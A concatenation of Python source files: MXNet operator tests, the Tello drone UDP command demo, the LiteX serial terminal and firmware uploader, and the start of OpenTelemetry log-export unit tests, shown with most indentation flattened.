weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@with_seed()
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
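# Worked example of compute_output_size above: with spatial=30, kernel=3,
# stride=2, dilate=2, pad=1 the dilated kernel spans 2*(3-1)+1 = 5 samples,
# so the output size is (30 + 2*1 - 5) // 2 + 1 = 14.
def _output_size_example():
    spatial, kernel, stride, dilate, pad = 30, 3, 2, 2, 1
    dilated_kernel = dilate * (kernel - 1) + 1
    assert (spatial + 2 * pad - dilated_kernel) // stride + 1 == 14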
if __name__ == '__main__':
import nose
nose.runmodule()
|
tello_commands.py | #
# Tello Python3 Control Demo
#
# http://www.ryzerobotics.com/
#
# 1/1/2018
#
# ** Original Ryze SDK file to issue commands to the drone. Not a dependency
import threading
import socket
import sys
import time
import platform
host = ''
port = 9000
locaddr = (host,port)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tello_address = ('192.168.10.1', 8889)
sock.bind(locaddr)
def recv():
count = 0
while True:
try:
data, server = sock.recvfrom(1518)
print(data.decode(encoding="utf-8"))
except Exception:
print ('\nExit . . .\n')
break
print ('\r\n\r\nTello Python3 Demo.\r\n')
print ('Tello: command takeoff land flip forward back left right \r\n up down cw ccw speed speed?\r\n')
print ('end -- quit demo.\r\n')
# Create and start the receive thread
recvThread = threading.Thread(target=recv)
recvThread.start()
while True:
try:
python_version = str(platform.python_version())
version_init_num = int(python_version.partition('.')[0])
# print (version_init_num)
if version_init_num == 3:
msg = input("");
elif version_init_num == 2:
msg = raw_input("")
if not msg:
break
if 'end' in msg:
print ('...')
sock.close()
break
# Send data
msg = msg.encode(encoding="utf-8")
sent = sock.sendto(msg, tello_address)
except KeyboardInterrupt:
print ('\n . . .\n')
sock.close()
break
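# Hedged helper sketch (not in the original Ryze demo): issues a single SDK
# command and waits for the reply with a timeout. Reuses the module-level
# `sock` and `tello_address`; only meaningful while the socket is still open.
def send_command(command, timeout=5.0):
    sock.settimeout(timeout)
    sock.sendto(command.encode("utf-8"), tello_address)
    try:
        data, _ = sock.recvfrom(1518)
        return data.decode("utf-8")
    except socket.timeout:
        return None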
|
litex_term.py | #!/usr/bin/env python3
#
# This file is part of LiteX.
#
# Copyright (c) 2015-2020 Florent Kermarrec <florent@enjoy-digital.fr>
# Copyright (c) 2015 Sebastien Bourdeauducq <sb@m-labs.hk>
# Copyright (c) 2016 whitequark <whitequark@whitequark.org>
# SPDX-License-Identifier: BSD-2-Clause
import sys
import signal
import os
import time
import serial
import threading
import multiprocessing
import argparse
import json
import socket
# Console ------------------------------------------------------------------------------------------
if sys.platform == "win32":
import ctypes
import msvcrt
class Console:
def configure(self):
# https://stackoverflow.com/a/36760881
# ENABLE_VIRTUAL_TERMINAL_PROCESSING
kernel32 = ctypes.windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)
def unconfigure(self):
pass
def getkey(self):
return msvcrt.getch()
# getch doesn't return Virtual Keycodes, but rather
# PS/2 Scan Codes. Keycodes starting with 0xE0 are
# worth handling.
def escape_char(self, b):
return b == b"\xe0"
def handle_escape(self, b):
return {
b"H" : b"\x1b[A", # Up
b"P" : b"\x1b[B", # Down
b"K" : b"\x1b[D", # Left
b"M" : b"\x1b[C", # Right
b"G" : b"\x1b[H", # Home
b"O" : b"\x1b[F", # End
b"R" : b"\x1b[2~", # Insert
b"S" : b"\x1b[3~", # Delete
}.get(b, None) # TODO: Handle ESC? Others?
else:
import termios
import pty
class Console:
def __init__(self):
self.fd = sys.stdin.fileno()
self.default_settings = termios.tcgetattr(self.fd)
def configure(self):
settings = termios.tcgetattr(self.fd)
settings[3] = settings[3] & ~termios.ICANON & ~termios.ECHO
settings[6][termios.VMIN] = 1
settings[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, settings)
def unconfigure(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.default_settings)
def getkey(self):
return os.read(self.fd, 1)
def escape_char(self, b):
return False
def handle_escape(self, b):
return None
# Bridge UART -------------------------------------------------------------------------------------
from litex import RemoteClient
class BridgeUART:
def __init__(self, name="uart_xover", host="localhost", base_address=None, csr_csv=None):
self.bus = RemoteClient(host=host, base_address=base_address, csr_csv=csr_csv)
present = False
for k, v in self.bus.regs.d.items():
if f"{name}_" in k:
setattr(self, k.replace(f"{name}_", ""), v)
present = True
if not present:
raise ValueError(f"CrossoverUART {name} not present in design.")
# FIXME: On PCIe designs, CSR is remapped to 0 to limit BAR0 size.
if base_address is None and hasattr(self.bus.bases, "pcie_phy"):
self.bus.base_address = -self.bus.mems.csr.base
def open(self):
self.bus.open()
self.file, self.name = pty.openpty()
self.pty2crossover_thread = multiprocessing.Process(target=self.pty2crossover)
self.crossover2pty_thread = multiprocessing.Process(target=self.crossover2pty)
self.pty2crossover_thread.start()
self.crossover2pty_thread.start()
def close(self):
self.bus.close()
self.pty2crossover_thread.terminate()
self.crossover2pty_thread.terminate()
def pty2crossover(self):
while True:
r = os.read(self.file, 1)
self.rxtx.write(ord(r))
def crossover2pty(self):
while True:
if self.rxfull.read():
length = 16
elif not self.rxempty.read():
length = 1
else:
time.sleep(1e-3)
continue
r = self.bus.read(self.rxtx.addr, length=length, burst="fixed")
for v in r:
os.write(self.file, bytes([v & 0xFF]))  # write the raw byte; utf-8 encoding would mangle values >= 0x80
# JTAG UART ----------------------------------------------------------------------------------------
from litex.build.openocd import OpenOCD
class JTAGUART:
def __init__(self, config="openocd_xc7_ft2232.cfg", port=20000, chain=1):
self.config = config
self.port = port
self.chain = chain
def open(self):
self.file, self.name = pty.openpty()
self.jtag2tcp_thread = multiprocessing.Process(target=self.jtag2tcp)
self.jtag2tcp_thread.start()
time.sleep(0.5)
self.pty2tcp_thread = multiprocessing.Process(target=self.pty2tcp)
self.tcp2pty_thread = multiprocessing.Process(target=self.tcp2pty)
self.tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.tcp.connect(("localhost", self.port))
self.pty2tcp_thread.start()
self.tcp2pty_thread.start()
def close(self):
self.jtag2tcp_thread.terminate()
self.pty2tcp_thread.terminate()
self.tcp2pty_thread.terminate()
def jtag2tcp(self):
prog = OpenOCD(self.config)
prog.stream(self.port, self.chain)
def pty2tcp(self):
while True:
r = os.read(self.file, 1)
self.tcp.send(r)
def tcp2pty(self):
while True:
r = self.tcp.recv(1)
os.write(self.file, bytes(r))
# Intel/Altera JTAG UART via nios2-terminal
class Nios2Terminal():
def __init__(self):
from subprocess import Popen, PIPE
p = Popen("nios2-terminal", stdin=PIPE, stdout=PIPE)
self.p = p
def read(self):
return self.p.stdout.read(1)
def in_waiting(self):
# unfortunately p.stdout does not provide
# information about awaiting input
return False
def write(self, data):
if data is not None:
self.p.stdin.write(data)
try:
self.p.stdin.flush()
except BrokenPipeError:
print("nios2-terminal has terminated, exiting...\n")
sys.exit(1)
def close(self):
self.p.terminate()
# SFL ----------------------------------------------------------------------------------------------
sfl_prompt_req = b"F7: boot from serial\n"
sfl_prompt_ack = b"\x06"
sfl_magic_req = b"sL5DdSMmkekro\n"
sfl_magic_ack = b"z6IHG7cYDID6o\n"
sfl_payload_length = 255
# General commands
sfl_cmd_abort = b"\x00"
sfl_cmd_load = b"\x01"
sfl_cmd_jump = b"\x02"
# Replies
sfl_ack_success = b"K"
sfl_ack_crcerror = b"C"
sfl_ack_unknown = b"U"
sfl_ack_error = b"E"
class SFLFrame:
def __init__(self):
self.cmd = bytes()
self.payload = bytes()
def compute_crc(self):
return crc16(self.cmd + self.payload)
def encode(self):
packet = bytes([len(self.payload)])
packet += self.compute_crc().to_bytes(2, "big")
packet += self.cmd
packet += self.payload
return packet
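# Hedged usage sketch (helper name is illustrative): a frame on the wire is
# [length:1][crc16:2 big-endian][cmd:1][payload], as built by encode() above.
def _example_jump_frame(address=0x40000000):
    frame = SFLFrame()
    frame.cmd = sfl_cmd_jump
    frame.payload = address.to_bytes(4, "big")
    return frame.encode()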
# CRC16 --------------------------------------------------------------------------------------------
crc16_table = [
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,
0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485,
0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,
0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4,
0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,
0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823,
0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,
0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12,
0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,
0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41,
0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,
0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70,
0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,
0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F,
0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E,
0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,
0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D,
0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C,
0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,
0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB,
0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,
0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A,
0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,
0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9,
0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
]
def crc16(l):
crc = 0
for d in l:
crc = crc16_table[((crc >> 8) ^ d) & 0xff] ^ (crc << 8)
return crc & 0xffff
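# Cross-check sketch (illustrative, not used by litex_term): the table above
# implements CRC-16 with polynomial 0x1021, init 0, no reflection (XMODEM);
# this bit-by-bit form computes the same value, e.g. 0x31C3 for b"123456789".
def _crc16_bitwise(data):
    crc = 0
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) if (crc & 0x8000) else (crc << 1)
            crc &= 0xFFFF
    return crc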
# LiteXTerm ----------------------------------------------------------------------------------------
class LiteXTerm:
def __init__(self, serial_boot, kernel_image, kernel_address, json_images, safe):
self.serial_boot = serial_boot
assert not (kernel_image is not None and json_images is not None)
self.mem_regions = {}
if kernel_image is not None:
self.mem_regions = {kernel_image: kernel_address}
self.boot_address = kernel_address
if json_images is not None:
f = open(json_images, "r")
json_dir = os.path.dirname(json_images)
for k, v in json.load(f).items():
self.mem_regions[os.path.join(json_dir, k)] = v
self.boot_address = self.mem_regions[list(self.mem_regions.keys())[-1]]
f.close()
self.reader_alive = False
self.writer_alive = False
self.prompt_detect_buffer = bytes(len(sfl_prompt_req))
self.magic_detect_buffer = bytes(len(sfl_magic_req))
self.console = Console()
signal.signal(signal.SIGINT, self.sigint)
self.sigint_time_last = 0
self.safe = safe
self.delay = 0
self.length = 64
self.outstanding = 0 if safe else 128
def open(self, port, baudrate):
if hasattr(self, "port"):
return
self.port = serial.serial_for_url(port, baudrate)
def close(self):
if not hasattr(self, "port"):
return
self.port.close()
del self.port
def sigint(self, sig, frame):
if hasattr(self, "port"):
self.port.write(b"\x03")
sigint_time_current = time.time()
# Exit term if 2 CTRL-C pressed in less than 0.5s.
if (sigint_time_current - self.sigint_time_last < 0.5):
self.console.unconfigure()
self.close()
sys.exit()
else:
self.sigint_time_last = sigint_time_current
def send_frame(self, frame):
retry = 1
while retry:
self.port.write(frame.encode())
# Get the reply from the device
reply = self.port.read()
if reply == sfl_ack_success:
retry = 0
elif reply == sfl_ack_crcerror:
retry = 1
else:
print("[LXTERM] Got unknown reply '{}' from the device, aborting.".format(reply))
return 0
return 1
def receive_upload_response(self):
reply = self.port.read()
if reply == sfl_ack_success:
return True
elif reply == sfl_ack_crcerror:
print("[LXTERM] Upload to device failed due to data corruption (CRC error)")
else:
print(f"[LXTERM] Got unexpected response from device '{reply}'")
sys.exit(1)
def upload_calibration(self, address):
print("[LXTERM] Upload calibration... ", end="")
sys.stdout.flush()
# Calibration parameters.
min_delay = 1e-5
max_delay = 1e-3
nframes = 16
length_range = [64, 128, 250]
# Run calibration with increasing delay and decreasing length.
delay = min_delay
working_delay = None
working_length = None
while delay <= max_delay:
for length in length_range:
#p0rint(f"delay {delay}, length {length}")
# Prepare frame.
frame = SFLFrame()
frame.cmd = sfl_cmd_load
frame_data = bytearray(min(length, sfl_payload_length-4))
frame.payload = address.to_bytes(4, "big")
frame.payload += frame_data
frame = frame.encode()
# Send N consecutive frames.
for i in range(nframes):
self.port.write(frame)
time.sleep(delay)
# Wait and get acks.
working = True
time.sleep(0.2)
while self.port.in_waiting:
ack = self.port.read()
#print(ack)
if ack in [sfl_ack_error, sfl_ack_crcerror]:
working = False
if working:
# Save working delay/length and exit.
working_delay = delay
working_length = min(length, sfl_payload_length - 4)
break
# Exit if working delay found.
if (working_delay is not None):
break
# Else increase delay.
delay = delay*2
# Set parameters.
if (working_delay is not None):
print(f"(inter-frame: {working_delay*1e6:5.2f}us, length: {working_length})")
self.delay = working_delay
self.length = working_length
else:
print("failed, switching to --safe mode.")
self.delay = 0
self.length = 64
self.outstanding = 0
def upload(self, filename, address):
f = open(filename, "rb")
f.seek(0, 2)
length = f.tell()
f.seek(0, 0)
print(f"[LXTERM] Uploading {filename} to 0x{address:08x} ({length} bytes)...")
# Upload calibration
if not self.safe:
self.upload_calibration(address)
# Force safe mode settings when calibration fails.
if self.delay is None:
self.delay = 0
self.length = 64
self.outstanding = 0
# Prepare parameters
current_address = address
position = 0
start = time.time()
remaining = length
outstanding = 0
while remaining:
# Show progress
sys.stdout.write("|{}>{}| {}%\r".format(
"=" * (20*position//length),
" " * (20-20*position//length),
100*position//length))
sys.stdout.flush()
# Send frame if max outstanding not reached.
if outstanding <= self.outstanding:
# Prepare frame.
frame = SFLFrame()
frame.cmd = sfl_cmd_load
frame_data = f.read(min(remaining, self.length-4))
frame.payload = current_address.to_bytes(4, "big")
frame.payload += frame_data
# Encode frame and send it.
self.port.write(frame.encode())
# Update parameters
current_address += len(frame_data)
position += len(frame_data)
remaining -= len(frame_data)
outstanding += 1
# Inter-frame delay.
time.sleep(self.delay)
# Read response if available.
while self.port.in_waiting:
ack = self.receive_upload_response()
if ack:
outstanding -= 1
break
# Get remaining responses.
for _ in range(outstanding):
self.receive_upload_response()
# Compute speed.
end = time.time()
elapsed = end - start
print("[LXTERM] Upload complete ({0:.1f}KB/s).".format(length/(elapsed*1024)))
f.close()
return length
def boot(self):
print("[LXTERM] Booting the device.")
frame = SFLFrame()
frame.cmd = sfl_cmd_jump
frame.payload = int(self.boot_address, 16).to_bytes(4, "big")
self.send_frame(frame)
def detect_prompt(self, data):
if len(data):
self.prompt_detect_buffer = self.prompt_detect_buffer[1:] + data
return self.prompt_detect_buffer == sfl_prompt_req
else:
return False
def answer_prompt(self):
print("[LXTERM] Received serial boot prompt from the device.")
self.port.write(sfl_prompt_ack)
def detect_magic(self, data):
if len(data):
self.magic_detect_buffer = self.magic_detect_buffer[1:] + data
return self.magic_detect_buffer == sfl_magic_req
else:
return False
def answer_magic(self):
print("[LXTERM] Received firmware download request from the device.")
if(len(self.mem_regions)):
self.port.write(sfl_magic_ack)
for filename, base in self.mem_regions.items():
self.upload(filename, int(base, 16))
self.boot()
print("[LXTERM] Done.")
def reader(self):
try:
while self.reader_alive:
c = self.port.read()
sys.stdout.buffer.write(c)
sys.stdout.flush()
if len(self.mem_regions):
if self.serial_boot and self.detect_prompt(c):
self.answer_prompt()
if self.detect_magic(c):
self.answer_magic()
except serial.SerialException:
self.reader_alive = False
self.console.unconfigure()
raise
def start_reader(self):
self.reader_alive = True
self.reader_thread = threading.Thread(target=self.reader)
self.reader_thread.daemon = True
self.reader_thread.start()
def stop_reader(self):
self.reader_alive = False
self.reader_thread.join()
def writer(self):
try:
while self.writer_alive:
b = self.console.getkey()
if b == b"\x03":
self.stop()
elif b == b"\n":
self.port.write(b"\x0a")
elif self.console.escape_char(b):
b = self.console.getkey()
ansi_seq = self.console.handle_escape(b)
self.port.write(ansi_seq)
else:
self.port.write(b)
except:
self.writer_alive = False
self.console.unconfigure()
raise
def start_writer(self):
self.writer_alive = True
self.writer_thread = threading.Thread(target=self.writer)
self.writer_thread.daemon = True
self.writer_thread.start()
def stop_writer(self):
self.writer_alive = False
self.writer_thread.join()
def start(self):
self.start_reader()
self.start_writer()
def stop(self):
self.reader_alive = False
self.writer_alive = False
def join(self, writer_only=False):
self.writer_thread.join()
if not writer_only:
self.reader_thread.join()
# Run ----------------------------------------------------------------------------------------------
def _get_args():
parser = argparse.ArgumentParser()
parser.add_argument("port", help="Serial port (eg /dev/tty*, bridge, jtag)")
parser.add_argument("--speed", default=115200, help="Serial baudrate")
parser.add_argument("--serial-boot", default=False, action='store_true', help="Automatically initiate serial boot")
parser.add_argument("--kernel", default=None, help="Kernel image")
parser.add_argument("--kernel-adr", default="0x40000000", help="Kernel address")
parser.add_argument("--images", default=None, help="JSON description of the images to load to memory")
parser.add_argument("--safe", action="store_true", help="Safe serial boot mode, disable upload speed optimizations")
parser.add_argument("--csr-csv", default=None, help="SoC CSV file")
parser.add_argument("--base-address", default=None, help="CSR base address")
parser.add_argument("--bridge-name", default="uart_xover", help="Bridge UART name to use (present in design/csr.csv)")
parser.add_argument("--jtag-name", default="jtag_uart", help="JTAG UART type: jtag_uart (default), jtag_atlantic")
parser.add_argument("--jtag-config", default="openocd_xc7_ft2232.cfg", help="OpenOCD JTAG configuration file for jtag_uart")
parser.add_argument("--jtag-chain", default=1, help="JTAG chain.")
return parser.parse_args()
def main():
args = _get_args()
term = LiteXTerm(args.serial_boot, args.kernel, args.kernel_adr, args.images, args.safe)
if sys.platform == "win32":
if args.port in ["bridge", "jtag"]:
raise NotImplementedError
if args.port in ["bridge", "crossover"]: # FIXME: 2021-02-18, crossover for retro-compatibility remove and update targets?
base_address = None if args.base_address is None else int(args.base_address)
bridge = BridgeUART(base_address=base_address, csr_csv=args.csr_csv, name=args.bridge_name)
bridge.open()
port = os.ttyname(bridge.name)
elif args.port in ["jtag"]:
if args.jtag_name == "jtag_atlantic":
term.port = Nios2Terminal()
port = args.port
elif args.jtag_name == "jtag_uart":
bridge = JTAGUART(config=args.jtag_config, chain=int(args.jtag_chain))
bridge.open()
port = os.ttyname(bridge.name)
else:
raise NotImplementedError
else:
port = args.port
term.open(port, int(float(args.speed)))
term.console.configure()
term.start()
term.join(True)
if __name__ == "__main__":
main()
|
test_export.py | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=protected-access
import logging
import multiprocessing
import os
import sys
import time
import unittest
from concurrent.futures import ThreadPoolExecutor
from unittest.mock import Mock, patch
from opentelemetry.sdk import trace
from opentelemetry.sdk._logs import (
LogData,
LogEmitterProvider,
LogRecord,
OTLPHandler,
)
from opentelemetry.sdk._logs.export import (
BatchLogProcessor,
ConsoleLogExporter,
SimpleLogProcessor,
)
from opentelemetry.sdk._logs.export.in_memory_log_exporter import (
InMemoryLogExporter,
)
from opentelemetry.sdk._logs.severity import SeverityNumber
from opentelemetry.sdk.resources import Resource as SDKResource
from opentelemetry.sdk.util.instrumentation import InstrumentationInfo
from opentelemetry.test.concurrency_test import ConcurrencyTestBase
from opentelemetry.trace import TraceFlags
from opentelemetry.trace.span import INVALID_SPAN_CONTEXT
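# Hedged sketch of the wiring pattern every test below repeats: a provider owns
# the processors, an emitter feeds an OTLPHandler, and that handler plugs into
# stdlib logging. (Helper name is illustrative; the tests do not call it.)
def _example_pipeline(exporter):
    provider = LogEmitterProvider()
    provider.add_log_processor(SimpleLogProcessor(exporter))
    emitter = provider.get_log_emitter(__name__)
    logger = logging.getLogger("example")
    logger.addHandler(OTLPHandler(log_emitter=emitter))
    return logger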
class TestSimpleLogProcessor(unittest.TestCase):
def test_simple_log_processor_default_level(self):
exporter = InMemoryLogExporter()
log_emitter_provider = LogEmitterProvider()
log_emitter = log_emitter_provider.get_log_emitter(__name__)
log_emitter_provider.add_log_processor(SimpleLogProcessor(exporter))
logger = logging.getLogger("default_level")
logger.addHandler(OTLPHandler(log_emitter=log_emitter))
logger.warning("Something is wrong")
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 1)
warning_log_record = finished_logs[0].log_record
self.assertEqual(warning_log_record.body, "Something is wrong")
self.assertEqual(warning_log_record.severity_text, "WARNING")
self.assertEqual(
warning_log_record.severity_number, SeverityNumber.WARN
)
def test_simple_log_processor_custom_level(self):
exporter = InMemoryLogExporter()
log_emitter_provider = LogEmitterProvider()
log_emitter = log_emitter_provider.get_log_emitter(__name__)
log_emitter_provider.add_log_processor(SimpleLogProcessor(exporter))
logger = logging.getLogger("custom_level")
logger.setLevel(logging.ERROR)
logger.addHandler(OTLPHandler(log_emitter=log_emitter))
logger.warning("Warning message")
logger.debug("Debug message")
logger.error("Error message")
logger.critical("Critical message")
finished_logs = exporter.get_finished_logs()
# Make sure only level >= logging.ERROR logs are recorded
self.assertEqual(len(finished_logs), 2)
error_log_record = finished_logs[0].log_record
fatal_log_record = finished_logs[1].log_record
self.assertEqual(error_log_record.body, "Error message")
self.assertEqual(error_log_record.severity_text, "ERROR")
self.assertEqual(
error_log_record.severity_number, SeverityNumber.ERROR
)
self.assertEqual(fatal_log_record.body, "Critical message")
self.assertEqual(fatal_log_record.severity_text, "CRITICAL")
self.assertEqual(
fatal_log_record.severity_number, SeverityNumber.FATAL
)
def test_simple_log_processor_trace_correlation(self):
exporter = InMemoryLogExporter()
log_emitter_provider = LogEmitterProvider()
log_emitter = log_emitter_provider.get_log_emitter("name", "version")
log_emitter_provider.add_log_processor(SimpleLogProcessor(exporter))
logger = logging.getLogger("trace_correlation")
logger.addHandler(OTLPHandler(log_emitter=log_emitter))
logger.warning("Warning message")
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 1)
log_record = finished_logs[0].log_record
self.assertEqual(log_record.body, "Warning message")
